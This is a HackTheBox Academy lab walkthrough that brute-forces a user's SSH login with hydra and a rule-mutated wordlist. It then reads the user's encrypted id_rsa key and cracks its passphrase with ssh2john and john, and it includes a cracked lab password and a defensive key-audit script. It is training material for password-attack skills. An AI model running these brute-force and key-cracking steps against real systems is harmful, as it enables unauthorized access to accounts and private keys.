Protected Files

ℹ️ Information

  • 🌐 Website: HackTheBox
  • 📚 Module: Password Attacks
  • 🔗 Link: Protected Files

Question

Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer.

📋 Walkthrough

We apply a custom rule to a password list to generate mutated password candidates, then use that list to brute-force the SSH login.

First, we use hashcat to generate a list of potential passwords:

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ hashcat --force password.list -r custom.rule --stdout | sort -u > mut.txt

Next, we use hydra to brute-force the SSH login for the user kira:

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ hydra -l kira ssh://10.129.202.64 -P mut.txt       
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-16 19:00:08
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 94044 login tries (l:1/p:94044), ~5878 tries per task
[DATA] attacking ssh://10.129.202.64:22/
[22][ssh] host: 10.129.202.64   login: kira   password: L0vey0u1!

We successfully find the password L0vey0u1! for the user kira.

kira:L0vey0u1!

Now, we log in to the host and navigate to the .ssh directory to find the id_rsa file:

kira@nix01:~$ cd .ssh
kira@nix01:~/.ssh$ ls
authorized_keys  id_rsa  id_rsa.pub
kira@nix01:~/.ssh$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,F1C2E21F3CF7BDF460FB56C7D16911F2

sqXnpt6fN4Ugi545CGyPWgfkaQhkDt5lKU6azI4amQ9mifdUkKzdR46EdrU3Pglh
xz3sC+Xdm7qkrtLEQ7rpk8w7zANcsxvQznGspuUv+c1hSvJdVgZAqTG84KFm
<SNIP>

We extract the hash from the id_rsa file (saved on the attack machine as rsa in the commands below) using ssh2john and then crack it with john:

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ ssh2john rsa > hash

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 24 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
L0****           (rsa)     
1g 0:00:00:01 DONE (2025-03-16 19:06) 0.8849g/s 1878Kp/s 1878Kc/s 1878KC/s L112893..Kristian1
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
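
The john output above reports KDF/cipher 0 (MD5/AES) with an iteration count of 1, which is what the `Proc-Type: 4,ENCRYPTED` and `DEK-Info` header lines indicate: the legacy PEM format protects the passphrase with MD5 at a single iteration. As an added example (not part of the original walkthrough), this Python check classifies a private key by how its passphrase is protected, so legacy-format keys can be found and re-encrypted; the function names and both sample inputs are assumptions constructed for illustration.

```python
import base64
import struct

MAGIC = b"openssh-key-v1\0"
LEGACY = {"-----BEGIN %s PRIVATE KEY-----" % t for t in ("RSA", "DSA", "EC")}

def _read_string(buf, off):
    """Read one SSH wire string (uint32 length, then bytes); return (value, next offset)."""
    (n,) = struct.unpack_from(">I", buf, off)
    return buf[off + 4:off + 4 + n], off + 4 + n

def _ssh_string(b):  # encode bytes as an SSH wire string
    return struct.pack(">I", len(b)) + b

def audit_key(text):
    """Return (format, kdf, rounds, cipher) describing a key's passphrase protection."""
    lines = [l.strip() for l in text.strip().splitlines()]
    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode("".join(lines[1:-1]))
        if not blob.startswith(MAGIC):
            raise ValueError("not an openssh-key-v1 blob")
        cipher, off = _read_string(blob, len(MAGIC))
        kdf, off = _read_string(blob, off)
        opts, off = _read_string(blob, off)
        if kdf == b"none":
            return ("openssh", "none", 0, "none")  # no passphrase at all
        _salt, pos = _read_string(opts, 0)  # bcrypt options: salt, then uint32 rounds
        (rounds,) = struct.unpack_from(">I", opts, pos)
        return ("openssh", kdf.decode(), rounds, cipher.decode())
    if lines[0] in LEGACY:
        dek = [l for l in lines if l.startswith("DEK-Info:")]
        if "Proc-Type: 4,ENCRYPTED" not in lines or not dek:
            return ("legacy-pem", "none", 0, "none")  # no passphrase at all
        # Legacy PEM encryption derives the key with MD5 at iteration count 1
        return ("legacy-pem", "md5", 1, dek[0].split(":", 1)[1].split(",")[0].strip())
    raise ValueError("unrecognised private key header")

def sample_openssh_key(rounds=16):
    """Constructed header-only sample (no key material) in openssh-key-v1 layout."""
    opts = _ssh_string(b"\x00" * 16) + struct.pack(">I", rounds)
    blob = MAGIC + _ssh_string(b"aes256-ctr") + _ssh_string(b"bcrypt") + _ssh_string(opts)
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n" + base64.b64encode(blob).decode()
            + "\n-----END OPENSSH PRIVATE KEY-----\n")

# Constructed sample: the header lines shown above, key body replaced by a placeholder
SAMPLE_LEGACY = ("-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
                 "DEK-Info: AES-128-CBC,F1C2E21F3CF7BDF460FB56C7D16911F2\n\nPLACEHOLDER\n"
                 "-----END RSA PRIVATE KEY-----\n")
print(audit_key(SAMPLE_LEGACY), audit_key(sample_openssh_key()))
```

A key reported as `legacy-pem` can be rewritten in the OpenSSH format with `ssh-keygen -p -f <keyfile>`, with `-a` setting the number of bcrypt rounds.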

Answer

L0****